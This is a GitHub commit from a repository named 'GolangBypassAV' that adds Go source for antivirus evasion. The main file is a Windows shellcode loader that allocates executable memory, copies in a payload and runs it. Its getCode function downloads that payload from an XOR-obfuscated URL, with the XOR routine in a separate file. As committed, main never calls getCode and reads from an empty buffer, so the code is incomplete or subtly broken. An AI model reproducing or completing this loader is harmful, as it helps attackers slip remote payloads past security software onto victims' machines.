commit

TheCryingGame · Aug 8, 2021 · e794f78 · e794f78
1 parent b4cc555
commit e794f78
Show file tree

Hide file tree

Showing 3 changed files with 134 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -1,2 +1,6 @@
 # GolangBypassAV
 研究利用golang来bypassAV
+
+## 说明
+免杀这块不是web狗擅长的,而且一个web狗不需要花太多时间来折腾这个，能用就行，不要追求全部免杀。
+
diff --git a/encry/main.go b/encry/main.go
@@ -0,0 +1,86 @@
+package main
+
+import (
+	"io/ioutil"
+	"log"
+	"net/http"
+	"os"
+	"syscall"
+	"unsafe"
+	//"os/exec"
+	//"fmt"
+)
+
+const (
+	MEM_COMMIT             = 0x1000
+	MEM_RESERVE            = 0x2000
+	PAGE_EXECUTE_READWRITE = 0x40
+)
+
+var (
+	kernel32           = syscall.MustLoadDLL("kernel32.dll")
+	ntdll              = syscall.MustLoadDLL("ntdll.dll")
+	VirtualAlloc       = kernel32.MustFindProc("VirtualAlloc")
+	procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")
+	// RtlCopyMemory      = ntdll.MustFindProc("RtlCopyMemory")
+	RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory")
+)
+
+func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {
+	ret, _, _ := procVirtualProtect.Call(
+		uintptr(lpAddress),
+		uintptr(dwSize),
+		uintptr(flNewProtect),
+		uintptr(lpflOldProtect))
+	return ret > 0
+}
+
+func checkErr(err error) {
+	if err != nil {
+		if err.Error() != "The operation completed successfully." {
+			println(err.Error())
+			os.Exit(1)
+		}
+	}
+}
+
+func getCode(key string) []byte {
+	xor := Xor{}
+	//远程加载
+	//Url0:= xor.d("daed8f25d0556d6fd037583947598324928")
+	url0 := xor.d(key)
+
+	var CL http.Client
+	//_ = exec.Command("calc.exe").Start()
+	//下方拼接shellcode文件名到url上
+	resp, err := CL.Get(url0 + "x")
+	if err != nil {
+		log.Fatal(err)
+	}
+	defer resp.Body.Close()
+	if resp.StatusCode == http.StatusOK {
+		bodyBytes, err := ioutil.ReadAll(resp.Body)
+		if err != nil {
+			log.Fatal(err)
+		}
+		return bodyBytes
+	}
+	return []byte{}
+}
+
+func main() {
+	var charcode []byte
+
+	addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
+	if addr == 0 {
+		checkErr(err)
+	}
+	_, _, err = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
+	checkErr(err)
+
+	for j := 0; j < len(charcode); j++ {
+		charcode[j] = 0
+	}
+
+	syscall.Syscall(addr, 0, 0, 0, 0)
+}
diff --git a/encry/xor.go b/encry/xor.go
@@ -0,0 +1,44 @@
+package main
+
+import (
+	"strconv"
+)
+
+var XorKey []byte = []byte{0x12, 0x34, 0x67, 0x6A, 0xA1, 0xFF, 0x04, 0x7B}
+
+type Xor struct {
+}
+
+type m interface {
+	enc(src string) string
+	dec(src string) string
+}
+
+func (a *Xor) e(src string) string {
+	var result string
+	j := 0
+	s := ""
+	bt := []rune(src)
+	for i := 0; i < len(bt); i++ {
+		s = strconv.FormatInt(int64(byte(bt[i])^XorKey[j]), 16)
+		if len(s) == 1 {
+			s = "0" + s
+		}
+		result = result + (s)
+		j = (j + 1) % 8
+	}
+	return result
+}
+
+func (a *Xor) d(src string) string {
+	var result string
+	var s int64
+	j := 0
+	bt := []rune(src)
+	for i := 0; i < len(src)/2; i++ {
+		s, _ = strconv.ParseInt(string(bt[i*2:i*2+2]), 16, 0)
+		result = result + string(byte(s)^XorKey[j])
+		j = (j + 1) % 8
+	}
+	return result
+}